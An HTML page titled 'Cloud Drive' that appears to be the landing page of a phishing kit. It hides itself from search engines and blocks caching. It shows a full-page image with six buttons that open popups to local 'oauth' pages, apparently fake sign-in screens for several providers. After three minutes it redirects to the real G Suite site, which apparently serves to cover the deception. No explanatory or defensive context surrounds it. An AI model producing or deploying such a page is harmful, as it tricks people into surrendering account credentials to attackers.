<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Cloud Drive</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="private">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="refresh" content="180;url=https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&cad=rja&uact=8&ved=0ahUKEwinx4uHwePXAhWSQt8KHT9OBHwQFghZMAc&url=https%3A%2F%2Fgsuite.google.com%2F&usg=AOvVaw18OAXowYvRz1WUEisTr8zc" />
<link rel="icon" type="images/png" sizes="16*16" href="images/favicon.ico">
<style type="text/css">
	#gvp_mainPopUpTitle {margin:0;padding:0;text-align:left;}
	#textarea{
        min-width: 290px !important; 
        max-width: 290px !important; 
        min-height: 136px !important; 
        max-height: 136px !important;
     } 
      #chars{
            top:0px !important;
      }
      #MainTab>li:focus{outline:1px dotted black;}
      .extend3o #wrapper:focus {outline: 1px dotted black;}
      .extend3o .notefontalertReg14.arrowRt{padding:0 15px 2px 0}      
</style>

<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<script type="text/javascript">
<!--
function popupwnd(url, toolbar, menubar, locationbar, resize, scrollbars, statusbar, left, top, width, height)
{
   if (left == -1)
   {
      left = (screen.width/2)-(width/2);
   }
   if (top == -1)
   {
      top = (screen.height/2)-(height/2);
   }
   var popupwindow = this.open(url, '', 'toolbar=' + toolbar + ',menubar=' + menubar + ',location=' + locationbar + ',scrollbars=' + scrollbars + ',resizable=' + resize + ',status=' + statusbar + ',left=' + left + ',top=' + top + ',width=' + width + ',height=' + height);
}
//-->
</script>

</head>
<body style="visibility: visible;" onload="unhideBody()" bgcolor="#f7f7f7">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1350px; height:916px; z-index:0">
<img src="images/b.png"   width="1350" border="0" height="916">
</div>
<div id="image2" style="position:absolute; overflow:hidden; left:204px; top:198px; width:360px; height:56px; z-index:1">
<a href="javascript:popupwnd('oauth/1.htm','no','no','no','no','no','no','300','100','431','519')" target="_self"><img src="images/1.png"   width="360" border="0" height="56"></a>
</div>
<div id="image3" style="position:absolute; overflow:hidden; left:204px; top:254px; width:360px; height:53px; z-index:2">
<a href="javascript:popupwnd('oauth/2.htm','no','no','no','no','no','no','300','100','400','400')" target="_self"><img src="images/2.png"   width="360" border="0" height="53"></a>
</div>
<div id="image4" style="position:absolute; overflow:hidden; left:205px; top:305px; width:359px; height:54px; z-index:3">
<a href="javascript:popupwnd('oauth/3.htm','no','no','no','no','no','no','300','100','400','500')" target="_self"><img src="images/3.png"   width="359" border="0" height="54"></a>
</div>
<div id="image5" style="position:absolute; overflow:hidden; left:205px; top:360px; width:359px; height:54px; z-index:4">
<a href="javascript:popupwnd('oauth/4.htm','no','no','no','no','no','no','300','100','400','500')" target="_self"><img src="images/4.png"   width="359" border="0" height="54"></a>
</div>
<div id="image6" style="position:absolute; overflow:hidden; left:204px; top:415px; width:360px; height:53px; z-index:5">
<a href="javascript:popupwnd('oauth/5.htm','no','no','no','no','no','no','300','100','400','400')" target="_self"><img src="images/5.png"   width="360" border="0" height="53"></a>
</div>
<div id="image7" style="position:absolute; overflow:hidden; left:205px; top:467px; width:359px; height:55px; z-index:6">
<a href="javascript:popupwnd('oauth/6.htm','no','no','no','no','no','no','300','100','400','400')" target="_self"><img src="images/6.png"   width="359" border="0" height="55"></a>
</div>
</form>
</body>
</html>

